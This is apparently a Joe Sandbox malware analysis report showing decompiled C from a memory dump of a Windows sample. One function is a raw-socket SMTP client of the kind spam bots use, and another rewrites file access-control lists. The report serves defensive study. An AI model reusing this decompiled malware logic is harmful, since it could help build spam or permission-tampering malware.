                                                                                                                                  0x00406511 0x00406512 0x0040651c 0x00406521 0x00406524 0x00406532 0x0040654d 0x0040654f 0x00406552 0x00406564 0x0040674e 0x00406755 0x00406755 0x0040656d 0x00406578 0x00406587 0x004065a3 0x004065e3 0x004065ee 0x004065f9 0x00406600 0x00406606 0x00406607 0x00406608 0x00406609 0x0040660f 0x0040661b 0x0040661c 0x0040661f 0x00406620 0x00406623 0x00406626 0x0040662c 0x0040662f 0x00406632 0x00406639 0x0040663a 0x0040663d 0x00406640 0x0040668a 0x0040668a 0x00406696 0x0040669e 0x00000000 0x00000000 0x00406643 0x00406648 0x00406650 0x00406671 0x00406673 0x00406676 0x00406678 0x00406678 0x0040667a 0x0040667d 0x0040667e 0x0040667f 0x00406680 0x00406681 0x00406688 0x00406689 0x00000000 0x00406689 0x00000000 0x00406648 0x004066a0 0x004066b3 0x004066b5 0x004066ba 0x004066bd 0x004066c7 0x004066cc 0x004066d1 0x004066d7 0x004066d7 0x004066d8 0x004066eb 0x004066eb 0x004066ff 0x00406701 0x00406704 0x00406706 0x00406706 0x00406709 0x0040670c 0x0040671f 0x00406734 0x0040673c 0x0040674b

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                                                                  • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                                                                  • API String ID: 2400214276-165278494
                                                                                                                                  • Opcode ID: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
                                                                                                                                  • Opcode Fuzzy Hash: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                                                                  Uniqueness
                                                                                                                                  • Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
                                                                                                                                  				short _v129;
                                                                                                                                  				char _v132;
                                                                                                                                  				char _v1156;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				int _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				char* _t62;
                                                                                                                                  				signed int _t63;
                                                                                                                                  				void* _t65;
                                                                                                                                  				signed int _t68;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				signed int _t78;
                                                                                                                                  				signed int _t80;
                                                                                                                                  				void* _t82;
                                                                                                                                  				signed int _t85;
                                                                                                                                  				signed int _t87;
                                                                                                                                  				signed int _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				intOrPtr _t102;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				void* _t104;
                                                                                                                                  				int _t121;
                                                                                                                                  				intOrPtr _t123;
                                                                                                                                  				void* _t124;
                                                                                                                                  				CHAR* _t125;
                                                                                                                                  				intOrPtr* _t126;
                                                                                                                                  				intOrPtr* _t127;
                                                                                                                                  				signed int _t129;
                                                                                                                                  				void* _t130;
                                                                                                                                  				void* _t131;
                                                                                                                                  
                                                                                                                                  				_t102 = _a8;                  // command selector; cases 1..12 are built by a switch outside this excerpt
                                                                                                                                  				_t2 = _t102 - 1; // 0x0
                                                                                                                                  				_t59 = _t2;
                                                                                                                                  				_t125 =  &_v132;              // outgoing line buffer
                                                                                                                                  				if(_t59 > 0xb) {              // selector not one of the 12 switch cases: send the buffer as is
                                                                                                                                  					L21:
                                                                                                                                  					_t60 = lstrlenA(_t125);
                                                                                                                                  					_t121 = _t60;
                                                                                                                                  					_t126 = __imp__#19;       // ws2_32.dll ordinal 19 = send (imported by ordinal, so no name in the IAT)
                                                                                                                                  					_t61 =  *_t126(_a4, _t125, _t121, 0);   // send(socket = _a4, line, len, 0)
                                                                                                                                  					if(_t61 == _t121) {       // whole line went out
                                                                                                                                  						__eflags = _t102 - 6;
                                                                                                                                  						if(_t102 != 6) {      // selector 6 takes another path (not in this excerpt)
                                                                                                                                  							L28:
                                                                                                                                  							_t127 = __imp__#16;   // ws2_32.dll ordinal 16 = recv
                                                                                                                                  							_t103 = 0;
                                                                                                                                  							_push(0);             // recv flags
                                                                                                                                  							_v1156 = 0;
                                                                                                                                  							_v132 = 0;
                                                                                                                                  							_push(0x3f6);         // len = 1014 bytes, fits the 1024-byte receive buffer between _v1156 and _v132
                                                                                                                                  							_t62 =  &_v1156;
                                                                                                                                  							while(1) {
                                                                                                                                  								_t63 =  *_t127(_a4, _t62);   // recv(socket, buf, 0x3f6, 0); len and flags were pushed above
                                                                                                                                  								__eflags = _t63;
                                                                                                                                  								if(_t63 <= 0) {       // 0 = peer closed the connection, SOCKET_ERROR (-1) = failure
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t103 = _t103 + _t63;
                                                                                                                                  								__eflags = _t103 - 0x1f4;
                                                                                                                                  								if(_t103 > 0x1f4) {
                                                                                                                                  									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
                                                                                                                                  									_push(6);
                                                                                                                                  									L72:
                                                                                                                                  									_pop(_t65);
                                                                                                                                  									return _t65;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _v132;
                                                                                                                                  								 *((char*)(_t130 + _t103 - 0x480)) = 0;
                                                                                                                                  								if(_v132 != 0) {
                                                                                                                                  									L33:
                                                                                                                                  									_t68 = E0040EE95( &_v1156,  &_v132);
                                                                                                                                  									__eflags = _t68;
                                                                                                                                  									if(_t68 != 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									L34:
                                                                                                                                  									_t92 = 0x3f6 - _t103;
                                                                                                                                  									__eflags = _t92;
                                                                                                                                  									_push(0);
                                                                                                                                  									_push(_t92);
                                                                                                                                  									_t62 = _t130 + _t103 - 0x480;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t103 - 3;
                                                                                                                                  								if(_t103 <= 3) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								E0040EE08( &_v132,  &_v1156, 4);
                                                                                                                                  								_t131 = _t131 + 0xc;
                                                                                                                                  								__eflags = _v132;
                                                                                                                                  								_v129 = 0x20;
                                                                                                                                  								if(_v132 == 0) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								goto L33;
                                                                                                                                  							}
                                                                                                                                  							_t123 = _a8;
                                                                                                                                  							__eflags = _t123 - 7;
                                                                                                                                  							if(_t123 == 7) {
                                                                                                                                  								L23:
                                                                                                                                  								_push(2);
                                                                                                                                  								goto L72;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t103 - 5;
                                                                                                                                  							if(_t103 <= 5) {
                                                                                                                                  								E0040EF00(_a16, "Too small respons\n");
                                                                                                                                  							} else {
                                                                                                                                  								E0040EE08(_a16,  &_v1156, 0x76);
                                                                                                                                  								_t131 = _t131 + 0xc;
                                                                                                                                  								_a16[0x76] = 0;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t103 - 5;
                                                                                                                                  							if(_t103 < 5) {
                                                                                                                                  								L71:
                                                                                                                                  								E0040EF00(_a16, "Incorrect respons");
                                                                                                                                  								_push(7);
                                                                                                                                  								goto L72;
                                                                                                                                  							} else {
                                                                                                                                  								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
                                                                                                                                  								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
                                                                                                                                  									goto L71;
                                                                                                                                  								}
                                                                                                                                  								_t104 = E0040EDAC( &_v1156);
                                                                                                                                  								__eflags = _t104 - 0xdc;
                                                                                                                                  								if(_t104 == 0xdc) {
                                                                                                                                  									L50:
                                                                                                                                  									_t129 = 1;
                                                                                                                                  									_t74 = E0040EE95( &_v1156, "ESMTP");
                                                                                                                                  									__eflags = _t74;
                                                                                                                                  									_t52 = _t74 != 0;
                                                                                                                                  									__eflags = _t52;
                                                                                                                                  									 *0x413668 = _t74 & 0xffffff00 | _t52;
                                                                                                                                  									_t123 = 1;
                                                                                                                                  									L51:
                                                                                                                                  									__eflags = _t123 - 0xc;
                                                                                                                                  									if(_t123 != 0xc) {
                                                                                                                                  										L54:
                                                                                                                                  										__eflags = _t129;
                                                                                                                                  										if(_t129 != 0) {
                                                                                                                                  											goto L23;
                                                                                                                                  										}
                                                                                                                                  										_t76 =  *0x413630; // 0x0
                                                                                                                                  										__eflags = _t76;
                                                                                                                                  										if(_t76 == 0) {
                                                                                                                                  											L70:
                                                                                                                                  											_push(0xb);
                                                                                                                                  											goto L72;
                                                                                                                                  										}
                                                                                                                                  										__eflags =  *0x413634 - _t129; // 0x0
                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                  											goto L70;
                                                                                                                                  										}
                                                                                                                                  										__eflags =  *0x413638 - _t129; // 0x0
                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                  											goto L70;
                                                                                                                                  										}
                                                                                                                                  										__eflags = _t123 - 4;
                                                                                                                                  										if(_t123 != 4) {
                                                                                                                                  											L61:
                                                                                                                                  											_t78 = E0040A699( &_v1156,  *0x413634);
                                                                                                                                  											__eflags = _t78;
                                                                                                                                  											if(_t78 == 0) {
                                                                                                                                  												_t80 = E0040A699( &_v1156,  *0x413638);
                                                                                                                                  												__eflags = _t80;
                                                                                                                                  												if(_t80 == 0) {
                                                                                                                                  													__eflags = _t123 - 3;
                                                                                                                                  													if(_t123 == 3) {
                                                                                                                                  														L69:
                                                                                                                                  														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
                                                                                                                                  														_push( &_v132);
                                                                                                                                  														_t85 = E0040EE95( &_v1156, E0040A7A3(_t82, _t82));
                                                                                                                                  														__eflags = _t85;
                                                                                                                                  														if(_t85 != 0) {
                                                                                                                                  															goto L62;
                                                                                                                                  														}
                                                                                                                                  														goto L70;
                                                                                                                                  													}
                                                                                                                                  													__eflags = _t123 - 4;
                                                                                                                                  													if(_t123 == 4) {
                                                                                                                                  														goto L69;
                                                                                                                                  													}
                                                                                                                                  													__eflags = _t123 - 5;
                                                                                                                                  													if(_t123 == 5) {
                                                                                                                                  														goto L69;
                                                                                                                                  													}
                                                                                                                                  													__eflags = _t123 - 6;
                                                                                                                                  													if(_t123 != 6) {
                                                                                                                                  														goto L70;
                                                                                                                                  													}
                                                                                                                                  													goto L69;
                                                                                                                                  												}
                                                                                                                                  												_push(0xa);
                                                                                                                                  												goto L72;
                                                                                                                                  											}
                                                                                                                                  											L62:
                                                                                                                                  											_push(9);
                                                                                                                                  											goto L72;
                                                                                                                                  										}
                                                                                                                                  										_t87 = E0040A699( &_v1156, _t76);
                                                                                                                                  										__eflags = _t87;
                                                                                                                                  										if(_t87 == 0) {
                                                                                                                                  											goto L61;
                                                                                                                                  										}
                                                                                                                                  										_push(8);
                                                                                                                                  										goto L72;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t104 - 0x217;
                                                                                                                                  									if(_t104 != 0x217) {
                                                                                                                                  										goto L54;
                                                                                                                                  									}
                                                                                                                                  									_push(0xf);
                                                                                                                                  									goto L72;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t104 - 0xfa;
                                                                                                                                  								if(_t104 == 0xfa) {
                                                                                                                                  									goto L50;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t104 - 0x162;
                                                                                                                                  								if(_t104 == 0x162) {
                                                                                                                                  									goto L50;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t104 - 0xdd;
                                                                                                                                  								if(_t104 == 0xdd) {
                                                                                                                                  									goto L50;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t104 - 0x14e;
                                                                                                                                  								if(_t104 == 0x14e) {
                                                                                                                                  									goto L50;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t104 - 0xeb;
                                                                                                                                  								if(_t104 == 0xeb) {
                                                                                                                                  									goto L50;
                                                                                                                                  								}
                                                                                                                                  								_t129 = 0;
                                                                                                                                  								goto L51;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t124 = 5;
                                                                                                                                  						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
                                                                                                                                  						__eflags = _t96 - _t124;
                                                                                                                                  						if(_t96 == _t124) {
                                                                                                                                  							goto L28;
                                                                                                                                  						}
                                                                                                                                  						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
                                                                                                                                  						return _t124;
                                                                                                                                  					}
                                                                                                                                  					if(_t102 != 7) {
                                                                                                                                  						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
                                                                                                                                  						_push(5);
                                                                                                                                  						goto L72;
                                                                                                                                  					}
                                                                                                                                  					goto L23;
                                                                                                                                  				}
                                                                                                                                  				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
                                                                                                                                  					case 0:
                                                                                                                                  						goto L28;
                                                                                                                                  					case 1:
                                                                                                                                  						_push(_a12);
                                                                                                                                  						_t100 =  &_v132;
                                                                                                                                  						if( *0x413668 == 0) {
                                                                                                                                  							_push("helo %s\r\n");
                                                                                                                                  						} else {
                                                                                                                                  							_push("ehlo %s\r\n");
                                                                                                                                  						}
                                                                                                                                  						goto L4;
                                                                                                                                  					case 2:
                                                                                                                                  						_push(_a12);
                                                                                                                                  						_push("mail from:<%s>\r\n");
                                                                                                                                  						goto L14;
                                                                                                                                  					case 3:
                                                                                                                                  						_push(_a12);
                                                                                                                                  						_push("rcpt to:<%s>\r\n");
                                                                                                                                  						L14:
                                                                                                                                  						__eax =  &_v132;
                                                                                                                                  						L4:
                                                                                                                                  						wsprintfA(_t100, ??);
                                                                                                                                  						goto L20;
                                                                                                                                  					case 4:
                                                                                                                                  						_push(7);
                                                                                                                                  						_push("data\r\n");
                                                                                                                                  						goto L19;
                                                                                                                                  					case 5:
                                                                                                                                  						goto L21;
                                                                                                                                  					case 6:
                                                                                                                                  						_push(7);
                                                                                                                                  						_push("quit\r\n");
                                                                                                                                  						goto L19;
                                                                                                                                  					case 7:
                                                                                                                                  						goto L21;
                                                                                                                                  					case 8:
                                                                                                                                  						_push(0xd);
                                                                                                                                  						_push("AUTH LOGIN\r\n");
                                                                                                                                  						L19:
                                                                                                                                  						__eax =  &_v132;
                                                                                                                                  						_push( &_v132);
                                                                                                                                  						__eax = E0040EE08();
                                                                                                                                  						goto L20;
                                                                                                                                  					case 9:
                                                                                                                                  						__eax = _a12;
                                                                                                                                  						_t9 = __eax + 1; // 0x1
                                                                                                                                  						__edx = _t9;
                                                                                                                                  						do {
                                                                                                                                  							__cl =  *__eax;
                                                                                                                                  							__eax = __eax + 1;
                                                                                                                                  							__eflags = __cl;
                                                                                                                                  						} while (__cl != 0);
                                                                                                                                  						goto L9;
                                                                                                                                  					case 0xa:
                                                                                                                                  						__eax = _a12;
                                                                                                                                  						_t15 = __eax + 1; // 0x1
                                                                                                                                  						__edx = _t15;
                                                                                                                                  						do {
                                                                                                                                  							__cl =  *__eax;
                                                                                                                                  							__eax = __eax + 1;
                                                                                                                                  							__eflags = __cl;
                                                                                                                                  						} while (__cl != 0);
                                                                                                                                  						L9:
                                                                                                                                  						__eax = __eax - __edx;
                                                                                                                                  						 *((char*)(__ebp + __eax - 0x80)) = 0;
                                                                                                                                  						L20:
                                                                                                                                  						_t131 = _t131 + 0xc;
                                                                                                                                  						goto L21;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x0040a7cb
                                                                                                                                  0x0040a7cf
                                                                                                                                  0x0040a7cf
                                                                                                                                  0x0040a7d3
                                                                                                                                  0x0040a7d9
                                                                                                                                  0x0040a87d
                                                                                                                                  0x0040a87e
                                                                                                                                  0x0040a886
                                                                                                                                  0x0040a88d
                                                                                                                                  0x0040a893
                                                                                                                                  0x0040a897
                                                                                                                                  0x0040a8bf
                                                                                                                                  0x0040a8c2
                                                                                                                                  0x0040a8f2
                                                                                                                                  0x0040a8f2
                                                                                                                                  0x0040a8f8
                                                                                                                                  0x0040a8fa
                                                                                                                                  0x0040a900
                                                                                                                                  0x0040a906
                                                                                                                                  0x0040a909
                                                                                                                                  0x0040a90a
                                                                                                                                  0x0040a978
                                                                                                                                  0x0040a97c
                                                                                                                                  0x0040a97e
                                                                                                                                  0x0040a980
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a912
                                                                                                                                  0x0040a914
                                                                                                                                  0x0040a91a
                                                                                                                                  0x0040a9b9
                                                                                                                                  0x0040a9c2
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x0040a920
                                                                                                                                  0x0040a924
                                                                                                                                  0x0040a92c
                                                                                                                                  0x0040a954
                                                                                                                                  0x0040a95f
                                                                                                                                  0x0040a966
                                                                                                                                  0x0040a968
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a96a
                                                                                                                                  0x0040a96c
                                                                                                                                  0x0040a96c
                                                                                                                                  0x0040a96e
                                                                                                                                  0x0040a970
                                                                                                                                  0x0040a971
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a971
                                                                                                                                  0x0040a92e
                                                                                                                                  0x0040a931
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a940
                                                                                                                                  0x0040a945
                                                                                                                                  0x0040a948
                                                                                                                                  0x0040a94c
                                                                                                                                  0x0040a952
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a952
                                                                                                                                  0x0040a982
                                                                                                                                  0x0040a985
                                                                                                                                  0x0040a988
                                                                                                                                  0x0040a89e
                                                                                                                                  0x0040a89e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a89e
                                                                                                                                  0x0040a98e
                                                                                                                                  0x0040a991
                                                                                                                                  0x0040a9d1
                                                                                                                                  0x0040a993
                                                                                                                                  0x0040a99f
                                                                                                                                  0x0040a9a7
                                                                                                                                  0x0040a9aa
                                                                                                                                  0x0040a9aa
                                                                                                                                  0x0040a9d8
                                                                                                                                  0x0040a9db
                                                                                                                                  0x0040ab39
                                                                                                                                  0x0040ab41
                                                                                                                                  0x0040ab48
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a9e1
                                                                                                                                  0x0040a9e1
                                                                                                                                  0x0040a9e9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a9fb
                                                                                                                                  0x0040a9fe
                                                                                                                                  0x0040aa04
                                                                                                                                  0x0040aa32
                                                                                                                                  0x0040aa40
                                                                                                                                  0x0040aa41
                                                                                                                                  0x0040aa46
                                                                                                                                  0x0040aa49
                                                                                                                                  0x0040aa49
                                                                                                                                  0x0040aa4d
                                                                                                                                  0x0040aa52
                                                                                                                                  0x0040aa54
                                                                                                                                  0x0040aa54
                                                                                                                                  0x0040aa57
                                                                                                                                  0x0040aa68
                                                                                                                                  0x0040aa68
                                                                                                                                  0x0040aa6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa70
                                                                                                                                  0x0040aa75
                                                                                                                                  0x0040aa77
                                                                                                                                  0x0040ab35
                                                                                                                                  0x0040ab35
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ab35
                                                                                                                                  0x0040aa7d
                                                                                                                                  0x0040aa83
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa89
                                                                                                                                  0x0040aa8f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa95
                                                                                                                                  0x0040aa98
                                                                                                                                  0x0040aab4
                                                                                                                                  0x0040aac1
                                                                                                                                  0x0040aac8
                                                                                                                                  0x0040aaca
                                                                                                                                  0x0040aadd
                                                                                                                                  [Control-flow graph view: only the per-node instruction address column survived extraction (addresses in the range 0x0040a7df to 0x0040ab33 plus 0x00000000 placeholders); the graph itself is not included]

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0040A7FB
                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8AF
                                                                                                                                  • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8E2
                                                                                                                                  • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                                                                  • wsprintfA.USER32 ref: 0040A9B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$send$lstrlenrecv
                                                                                                                                  • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                                                                  • API String ID: 3650048968-2394369944
                                                                                                                                  • Opcode ID: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                                                                  • Opcode Fuzzy Hash: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E00407809(CHAR* _a4, signed int _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				struct _ACL* _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				int _v28;
                                                                                                                                  				long _v32;
                                                                                                                                  				long _v36;
                                                                                                                                  				long _v40;
                                                                                                                                  				long _v44;
                                                                                                                                  				int _v48;
                                                                                                                                  				int _v52;
                                                                                                                                  				union _SID_NAME_USE _v56;
                                                                                                                                  				int _v60;
                                                                                                                                  				void _v128;
                                                                                                                                  				char _v384;
                                                                                                                                  				char _v512;
                                                                                                                                  				struct _SECURITY_DESCRIPTOR _v1536;
                                                                                                                                  				struct _ACL* _t110;
                                                                                                                                  				int _t120;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  				signed int _t123;
                                                                                                                                  				signed int _t141;
                                                                                                                                  				char* _t146;
                                                                                                                                  				signed int _t153;
                                                                                                                                  				void* _t154;
                                                                                                                                  				void* _t155;
                                                                                                                                  				void* _t156;
                                                                                                                                  
                                                                                                                                  				_t141 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v20 = 0;
	_v36 = 0x80;
	if(GetUserNameA( &_v384,  &_v36) == 0) {
		L42:
		return _v28;
	}
	_v32 = 0x44;
	_v40 = 0x80;
	if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
		goto L42;
	}
	_v32 = GetLengthSid( &_v128);
	_v44 = 0x400;
	if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
		goto L42;
	} else {
		if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
			_v36 = 0x80;
			_v40 = 0x80;
			if(EqualSid( &_v128, _v16) == 0) {
				_v28 = 1;
				_t155 = LocalAlloc(0x40, 0x14);
				if(_t155 != 0) {
					LocalFree(_t155);
				}
			}
		}
		_v24 = _t141;
		if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
			L41:
			goto L42;
		}
		_t110 = _v20;
		if(_t110 == _t141) {
			goto L41;
		}
		_v8 = _v8 & _t141;
		if(0 >= _t110->AceCount) {
			goto L41;
		} else {
			goto L13;
		}
		do {
			L13:
			if(GetAce(_t110, _v8,  &_v12) == 0) {
				L32:
				_v8 = _v8 + 1;
				goto L33;
			}
			_t153 = 0;
			_v16 = _v12 + 8;
			if(_t141 <= 0) {
				L19:
				if(_t141 < 0x20) {
					 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
					_t141 = _t141 + 1;
				}
				_t120 = EqualSid( &_v128, _v16);
				_t146 = _v12;
				if(_t120 == 0) {
					_t121 = 0x1200a8;
				} else {
					asm("sbb eax, eax");
					_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
				}
				if( *((intOrPtr*)(_t146 + 4)) != _t121) {
					 *((intOrPtr*)(_t146 + 4)) = _t121;
					_t146 = _v12;
					_v24 = 1;
				}
				if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
					 *_t146 = 0;
					_t66 = _v16 + 8; // 0xc8685f74
					_t123 =  *_t66;
					if(_t123 != 0) {
						 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
					} else {
						 *((char*)(_v12 + 1)) = 0xb;
					}
					_v24 = 1;
				}
				goto L32;
			}
			while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
				_t153 = _t153 + 1;
				if(_t153 < _t141) {
					continue;
				}
				break;
			}
			if(_t153 >= _t141) {
				goto L19;
			}
			DeleteAce(_v20, _v8);
			_v24 = 1;
			L33:
			_t110 = _v20;
		} while (_v8 < (_t110->AceCount & 0x0000ffff));
		if(_v24 != 0) {
			_v28 = 1;
			_t154 = LocalAlloc(0x40, 0x14);
			if(_t154 != 0) {
				if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
					_v28 = 1;
				}
				LocalFree(_t154);
			}
		}
		goto L41;
	}
}

APIs
• GetUserNameA.ADVAPI32(?,?), ref: 0040782F
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
• GetLengthSid.ADVAPI32(?), ref: 00407878
• GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
• GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
• EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
• LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
• SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
• LocalFree.KERNEL32(00000000), ref: 00407917
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
• GetAce.ADVAPI32(?,00000000,?), ref: 00407963
• EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
• DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
• EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
• LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 3722657555-2746444292
                                                                                                                                  • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                                                                  • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 97%
